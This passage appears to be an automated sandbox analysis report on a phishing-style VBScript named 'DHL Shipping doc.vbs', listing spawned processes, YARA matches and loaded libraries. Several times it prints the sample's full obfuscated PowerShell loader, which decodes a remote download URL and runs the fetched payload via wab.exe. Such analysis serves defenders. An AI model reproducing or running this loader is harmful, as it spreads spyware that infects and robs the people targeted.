ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8ACED6	1_2_00007FFD9B8ACED6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8ADC82	1_2_00007FFD9B8ADC82
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_084F1010	4_2_084F1010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_084F18E0	4_2_084F18E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_084F0CC8	4_2_084F0CC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_22244A98	9_2_22244A98
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2224A970	9_2_2224A970
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_22243E80	9_2_22243E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_222441C8	9_2_222441C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2224F86F	9_2_2224F86F

Java / VBScript file with very long strings (likely obfuscated code)

Source: DHL Shipping doc.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: amsi64_6692.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_5932.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6692, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5932, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@12/7@5/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Aptychus.Whi

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ireixikg.yh2.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6692
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5932
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DHL Shipping doc.vbs

Virustotal: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
